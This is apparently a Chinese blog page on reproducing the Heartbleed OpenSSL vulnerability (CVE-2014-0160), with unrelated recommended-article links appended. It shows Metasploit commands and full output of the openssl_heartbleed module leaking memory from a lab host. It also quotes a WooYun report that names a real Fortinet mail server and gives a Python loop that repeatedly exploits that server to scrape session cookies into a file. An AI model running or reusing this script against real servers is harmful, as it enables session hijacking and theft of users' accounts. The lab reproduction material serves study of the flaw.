漏洞分析的两篇文章

https://blog.csdn.net/javajiawei/article/details/82429886

https://xz.aliyun.com/t/1771

set verbose true 才能看到

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134

rhosts => 172.16.20.134

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 172.16.20.134:443     - Sending Client Hello...

[*] 172.16.20.134:443     - SSL record #1:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  86

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 82

[*] 172.16.20.134:443     -             Type:   Server Hello (2)

[*] 172.16.20.134:443     -             Server Hello Version:           0x0301

[*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b

[*] 172.16.20.134:443     -             Server Hello Session ID length: 32

[*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af

[*] 172.16.20.134:443     - SSL record #2:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  909

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 905

[*] 172.16.20.134:443     -             Type:   Certificate Data (11)

[*] 172.16.20.134:443     -             Certificates length: 902

[*] 172.16.20.134:443     -             Data length: 905

[*] 172.16.20.134:443     -             Certificate #1:

[*] 172.16.20.134:443     -                     Certificate #1: Length: 899

[*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>

[*] 172.16.20.134:443     - SSL record #3:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  331

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 327

[*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)

[*] 172.16.20.134:443     - SSL record #4:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  4

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 0

[*] 172.16.20.134:443     -             Type:   Server Hello Done (14)

[*] 172.16.20.134:443     - Sending Heartbeat...

[*] 172.16.20.134:443     - Heartbeat response, 65535 bytes

[+] 172.16.20.134:443     - Heartbeat response with leak

[*] 172.16.20.134:443     - Printable info leaked:

......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

乌云案例

详细说明:

code 区域

Fortinet邮箱服务器url:https://mail.fortinet.com.cn

存在漏洞的端口:443

该端口存在CVE-2014-0160即心脏滴血漏洞,每次可以读取服务器内存64 KB数据

首先是神器openssl.py测试信息:

code 区域

可以看到账户cookie,可以通过如下脚本,不断的抓cookie:

code 区域

import os

import re

import time

accounts = []

while True:

    result = os.popen('openssl.py mail.fortinet.com.cn').read()

    matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)

    for match in matches:

        if match not in accounts:

            accounts.append(match)

            with open('accounts.txt', 'a') as inFile:

                inFile.write(str(match) + '\n')

            print 'New Account:', match

    time.sleep(1.0)

抓了一小会就有三个:

漏洞证明:

修复方案:

补丁

HEARTBLEED 漏洞复现的更多相关文章

  1. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  2. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  3. ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

    没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...

  4. 【S2-052】漏洞复现(CVE-2017-9805)

    一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2 ...

  5. markdown反射型xss漏洞复现

    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...

  6. WebLogic XMLDecoder反序列化漏洞复现

    WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...

  7. Struts2-052 漏洞复现

    s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描 ...

  8. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  9. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

随机推荐

  1. D. Almost All Divisors(数学分解因子)

    其实这题并不难啊,但是分解因子的细节一定要小心. \(比如样例48,2是因子说明24也是因子,也就是说假如x存在\) \(那么x一定是因子中的最小数乘上最大数\) \(那我们现在去验证x是否存在,先拿 ...

  2. 自己动手写RPC

    接下来2个月 给自己定个目标 年前  自己动手做个RPC 框架 暂时技术选型  是 dotcore + netty + zookeeper/Consul

  3. 【Hadoop离线基础总结】大数据集群环境准备

    大数据集群环境准备 三台虚拟机关闭防火墙 centOS 7 service firewalld stop ->关闭防火墙 chkconfig firewalld off ->开机关闭防火墙 ...

  4. 一看就懂的Ubuntu系统下samba服务器安装配置教程

    文章目录 前言 环境搭建 安装 配置 Examples 1 创建共享(任何人都可以访问) 2 单用户权限(需要密码访问) 添加samba用户 配置参数 3 支持游客访问(单用户拥有管理员权限) 前言 ...

  5. [zoj3591]Nim 游戏

    题意:有n堆火柴,选择连续若干堆火柴进行Nim游戏,求让先手胜的选择方案数. 思路:让先手胜等同于这些数的异或值不同于0,不妨转化为求让先手败的方案数.此时记录一个前缀的异或和val[i],那么答案就 ...

  6. 智能制造:数字化协同技术在BIW焊装产线的应用

    随着汽车工业的发展,如何利用数字化技术提高整车制造水平,已经成为各厂商亟待解决的问题.通过数字化工厂系统的应用使得白车身整车项目前期工艺设计.生产线规划质量有了显著提升,数字化工厂已经成为现代焊装生产 ...

  7. Postman学习宝典(一)

    前言:网上看到的比较好的Postman教程,既然已经有了,我就不重复造轮子了,直接copy过来. 资源来源于:米阳MeYoung Postman 入门1- 安装.变量.代理 简介 Postman 是一 ...

  8. python实现简易词频统计-源码

    需求:给瓦尔登湖文章统计单词出现的频率 思路:首先读取文件并以空格分割得到列表,然后利用for循环遍历列表中的元素并把去掉列表元素中的符号,第三步去掉相同的元素,将列表转换为一个字典,最后按照键值对升 ...

  9. 都0202年了,你还不知道javascript有几种继承方式?

    前言     当面试官问你:你了解js哪些继承方式?es6的class继承是如何实现的?你心中有很清晰的答案吗?如果没有的话,可以通过阅读本文,帮助你更深刻地理解js的所有继承方式.       js ...

  10. Codeforces1176A(A题)Divide it!

    Divide it! You are given an integer nn. You can perform any of the following operations with this nu ...